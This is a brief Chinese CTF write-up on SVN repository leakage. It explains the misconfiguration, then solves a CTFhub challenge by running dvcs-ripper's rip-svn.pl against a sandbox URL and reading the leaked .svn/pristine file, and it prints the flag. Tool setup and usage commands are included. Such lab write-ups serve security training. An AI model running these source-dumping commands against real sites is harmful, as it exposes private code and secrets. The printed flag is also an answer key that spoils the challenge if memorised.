Nu1L Book——SVN泄露
SVN源代码漏洞原理
由于管理员操作不规范,将SVN隐藏文件夹暴露到公网,造成源代码泄露。
利用.svn/entries
或wc.db
文件获取服务器源码
CTFhub SVN泄露 WriteUp
场景地址:http://challenge-79ed2df4ce8b050a.sandbox.ctfhub.com:10080/
提示SVN
泄露,使用dvcs-ripper
工具
1 | /rip-svn.pl -v -u http://challenge-79ed2df4ce8b050a.sandbox.ctfhub.com:10080/ |
进入.svn
目录
1 | cd .svn |
tree
一下.svn
目录
1 | tree .svn |
最终在.svn/pristine/95
目录下,cat
一下95dde9131c85e8775b63fad42e8176cde78b55be.svn-base
文件
flag就在这个文件中
1 | cat 95dde9131c85e8775b63fad42e8176cde78b55be.svn-base |
flag为:ctfhub{dfecdf8f3f2b34d43aa4d627}
dvcs-ripper 工具使用
更换kali镜像源:
1 | nano /etc/apt/sources.list |
替换内容如下:
1 | #aliyun 阿里云 |
安装依赖:
1 | sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl |
使用方法:
1 | ./rip-svn.pl -v -u http://example.com/ |